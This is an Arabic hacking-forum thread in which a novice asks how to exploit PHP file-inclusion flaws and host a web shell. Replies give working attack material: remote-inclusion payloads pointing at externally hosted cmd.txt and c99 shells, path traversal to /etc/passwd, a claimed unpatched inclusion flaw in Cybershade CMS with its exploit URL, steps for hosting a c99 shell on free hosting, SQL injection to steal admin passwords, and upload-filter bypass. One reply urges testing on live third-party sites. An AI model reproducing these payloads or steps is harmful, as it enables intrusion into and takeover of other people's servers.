3 استفسارات سهلة على المحترفين

3 استفسارات سهلة على المحترفين


النتائج 1 إلى 10 من 10

الموضوع: 3 استفسارات سهلة على المحترفين

  1. #1

    Come 3 استفسارات سهلة على المحترفين

    السلام عليكم يا إخوان

    لدي 3 استفسارات المرجو أن تجيبوني عليهم .

    الأول : أنا أنا أحمل سكريبتات و أبحث عن ثغرات الفايل أنكلود و أجد بعض الثغرات و أريد أن أجرب عليها رفع الشيل لكن لا أعرف كيف أفتحها على جهازي( يعني أجرب الثغرة في لوكال هوست )

    + طريقة استعماله و كيف أدخل للثغراات من خلاله ...
    الثاني : كيف أضع دورك لثغرات فايل أنكلود حتى أبحث عنه في قوقل

    الثالث : كيف أرفع شيل بصيغة txt على استضافة مجانية لكي أستعمله

    و شكراا لكم مسبقاا
    و السلام خير ختااام
    التعديل الأخير تم بواسطة cs-man ; 11-07-2009 الساعة 01:42 PM

  2. #2

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    سااااااااااااااعدوووووووو وووووووووني بليز

  3. #3

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    اي مساعده او اي شي رجاء على ايميلي>>>[email protected] <<ايميلي الجديد طبعن

  4. #4

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    أين أنتم يا شباب المنتدى هل من مساعدة

  5. #5

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    بسم الله الرحمن الرحيم

    كيفك أخي



    شرح استغلال ثغرات الفايل انكلود

    ما هي ثغرات الفايل انكلود

    هذه الثغرات عبارة عن تطبيق اكواد عبر ادخال ملفات باستخدام دوال معينة تكون مستخدمة بالسكربت لتطبيق اوامر اخرى ..

    الدوال التي يمكن استغلالها لتطبيق الفايل انكلود

    كود:

    include
    require
    include_once
    require_once



    ما هو عمل هذه الدوال

    هذه الدوال تقوم بتطبيق محتوي ملف معين كملف برمجي ..

    اي ادخال الاكواد من ملفات خارجية .. ولا يخلى اي سكريبت من احد هذه الدوال

    ولكن تكون الثغرة في استخدام المتغيرات داخل هذه الدوال وامكانية التعديل على المتغير

    انواع ثغرات ال File include

    هذا النوع ينقسم الى قسمين :-

    1 : Remote File Include :-
    وهو عملية تطبيق كود من ملف اي ملف وليس بالشرط ان يكون على نفس السيرفر .. اي يمكن تطبيق اكواد اي ملف اخر .. دون اي مشاكل

    2: Local File include :-
    وهي امكانية تطبيق كود اي ملف اخر من على نفس السيرفر

    كيف يتم اكتشاف ثغرات الفايل انكلود ؟

    طبعا لكي تكتشف ثغرات الفايل انكلود يجب عليك البحث بالشفرة المصدرية او الكود للسكربتات ..

    وهذا الكود مثال على ثغرات الفايل انكلود
    كود:

    <?php

    $page = $_GET['page'];

    include ($page);

    ?>



    وفي هذه الحالة يتم تطبيق الثغرة بكل سهولة على الملف باستخدام المتغير page

    ففي هذه الحالة يكون الاستغلال مثلا
    file.php?page=****l.txt

    او اي ملف اخر مثلا

    file.php?page=http://members.lycos.co.uk/soqor10/cmd.txt&cmd=id

    اما لو كان الكود مثلا

    كود:
    <?php


    $page = $_GET['page'];

    include ("./pages/$page");

    ?>



    فهنا يمكن فقط ادخال ملفات داخلية اي على نفس السيرفر

    وطبعا يمكن استخدام النقاط بشكل طبيعي لتخطي المجلدات

    مثلا لو كان مسار الملف
    /home/user/public_html/file.php

    يكون الاستغلال للوصول لل /etc/passwd

    file.php?page=../../../../etc/passwd

    او مثلا لو قمت برفع ملف شل بامتداد gif على مركز رفع على نفس السيرفر

    واكن مسار الملف /home/upload/public_html/uploads/file01c144dd.gif

    تدخله بالطريقة التالية

    file.php?page=../../../../home/upload/public_html/uploads/file01c144dd.gif

    تطبيق عملي على اكتشاف ثغرات ال file include

    والثغرة لم ترقع ولم تنشر حتى الان

    اسم السكربت
    Cybershade CMS

    يمكنك تحميل السكربت منwww.sf.net

    انا بالعادة عندما افحص سكربت من الثغرات ابدأ بملفات ال core او ال includes اي الملفات التي تدرج دوما في كل الملفات ولا تكون رئيسية لانها بالغالب يكون بها الثغرات

    لذا سنقوم بفتح ملف core/includes.php

    محتوى الملف
    كود:
    <?php
    //This file has the main includes all in one file, this will enable us to change the files if we need to
    include "xconnect.php"; //connection infomation
    include $CMS_ROOT."core/core.php"; //main core of the CMS
    include $CMS_ROOT."core/security.php"; //CMS security
    include $CMS_ROOT."core/menus.php"; //Menus
    include $CMS_ROOT."core/classes.php"; //Diffrent Classes
    //include $CMS_ROOT."core/bbcode.php"; //bbcodes
    template(); //call upon the template function
    ?>



    ولكن الملف xconnect.php غير موجود بنفس المجلد لذا سيظهر رسالة خطأ ولكن لان الدالة هي Include فانه يكمل دون التوقف للخطأ وهنا يمكننا استغلال هذا الخطأ


    انظر
    كود:


    include $CMS_ROOT."core/core.php"; //main core of the CMS



    ولان هذا الملف لا يوجد فيه اي شيء قبل هذا السطر او لا يقوم بتطبيق شيء بشكل حقيقي اذا يمكننا اضافة قيمة للمتغير CMS_ROOT

    لذا لو قمنا بعمل مثلا
    core/includes.php?CMS_ROOT=http://www.soqor.net/index/?

    فانه سيقوم بادراج الصفحة .. وهنا يمكننا استخدام اي شيل بصيغة gif او txt

    ويمكن ايضا النظر مثلا في ملف اخر ك core.php

    اول اسطر فيه
    كود:


    <?php
    session_start();
    error_reporting (E_ERROR | E_WARNING | E_PARSE); //this will be set to 0 when released, this is to stop any error's showing up
    //error_reporting (0);
    include $CMS_ROOT."core/base_functions.php"; //functions that the CMS will use



    وايضا لا يوجد شيء قبل CMS_ROOT اذا اذا قمنا بتعيين قيمة لهذا المتغير فانه سيمكننا ادراج شيل على الصفحة


    وطبعا هذا النوع من الثغرات يعتمد بشكل رئيسي على القدرة على قراءة الاكواد والصبر



    ====================
    لازم يكون لديك شيل بصيغة txt
    c99.txt واعتقد يوجد منه في المنتدى

    وبعد ضلك تدخل على جوجل وتبحث على إستضافة مجانية

    وتحجز لك إستضافة

    هذه إستضافة مجانية
    http://www.free-web-host.me/
    أو هذه
    2KMegs.com - Free reliable cPanel web hosting - 2 Gigs of disk space, 5 Gigs of bandwidth, cPanel control panel, mail, and more! 2kmegs offers great uptime and support for your website.

    بعد حجز موقعك ترفع الشيل

    مثل إسم موقعك
    www.xxx.com

    ورفعته الشيل

    يصير هكذا
    www.xxx.com/c99.txt
    هكذا أنت رفعت شيل txt

    إنتهينا


    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  6. #6

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    إذا لا تعرف الرفع على السي بانل إرفع على ال ftp
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  7. #7

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    أخي المدير أنا فهمت بعض الأشياء و أخرى لا و بمن الأشياء التي لم أفهمها هي :
    1) الأول :

    اما لو كان الكود مثلا


    كود:
    <?php



    $page = $_GET['page'];

    الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/f19/2475/

    include ("./pages/$page");


    ?>




    فهنا يمكن فقط ادخال ملفات داخلية اي على نفس السيرفر


    وطبعا يمكن استخدام النقاط بشكل طبيعي لتخطي المجلدات


    مثلا لو كان مسار الملف
    /home/user/public_html/file.php


    يكون الاستغلال للوصول لل /etc/passwd


    file.php?page=../../../../etc/passwd


    او مثلا لو قمت برفع ملف شل بامتداد gif على مركز رفع على نفس السيرفر


    واكن مسار الملف /home/upload/public_html/uploads/file01c144dd.gif


    تدخله بالطريقة التالية


    file.php?page=../../../../home/upload/public_html/uploads/file01c144dd.gif


    2) الثاني : بعد ما أفحص السكريبت و وجدت ثغرة سيبقى لي أن أجربها و أرفع عليها الشيل

    لكن كيف سأفعل هذااا . لهذا كنت أسأل عن localhost . هل سأستعمله هنا و كيف ذلك ؟؟

  8. #8

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    أخي العزيز انا أنصحك تبحث عن ثغرة وتجرب عليها وليس على ال localhost


    تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )

    1. الموقع = www.xxx.com
    2. مجلد السكربت = Folder
    3. الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php
    4. المتغير الى نربط به الملف الخارجى ( الشل ) incloud
    5. علامة =
    6. الشل بصغية تكتس = you****l.txt
    7. وعلامة ؟
    وهو .. كيف اعرف ثغرات الانكلود ... او كيف اعرف الاستغلال لثغرة ...
    راح نقولك يا اخى العزيز .. انه فى مواقع سيكورتى خاصة تعرض لك اخر الثغرات المكتشفة بالاضافة الى طريقة الاستغلال
    من هذه المواقع http://milw0rm.com وكذلك http://securityfocus.com

    طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.com/webapps.php ونبحث عن الثغرات الفايل الانكلود
    هذا مثال على الثغرة http://milw0rm.com/exploits/4607





    وهذا رابط شيل c99
    http://m4nn3r.by.ru/c99.txt?
    النوع الثاني من الثغرات

    ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع
    وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس
    وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ...

    ناخذ مثال على هذا النوع http://milw0rm.com/exploits/4620



    النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل
    شاهد معى الصورة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز
    فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا
    C99.php.rar





    تحياتي وإن شاء اللهتكون فهمت الشرح

    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  9. #9

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    شكراا لك أخي العزيز شرح وافي و كافي

    لكن أنا مازلت أبحث عن كيف أستعمل اللوكال هوست لكي أعرض الثغراات على جهازي و أشوف هل هي صالحة لرفع الشيل أم لا

  10. #10

    افتراضي رد: 3 استفسارات سهلة على المحترفين

    فهمت يا اخوي المدير ما قصر في شرحه والله يعطيه العافيه

المواضيع المتشابهه

  1. ثغرة تستطيع القول سهلة (تظهرلك الباسورد)
    بواسطة rakan naber في المنتدى قسم الثغرات
    مشاركات: 37
    آخر مشاركة: 08-28-2012, 07:52 PM
  2. مشكلة سهلة بالنسبة لكم :)
    بواسطة mojahed_net في المنتدى منتدى لغات البرمجة
    مشاركات: 7
    آخر مشاركة: 06-22-2012, 09:49 PM
  3. عبادات سهلة لها أجر عظيم
    بواسطة mahmoud38 في المنتدى المنتدى إلاسلامي
    مشاركات: 2
    آخر مشاركة: 03-27-2010, 04:02 PM
  4. الي المحترفين
    بواسطة NAIF في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 4
    آخر مشاركة: 12-26-2009, 09:27 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •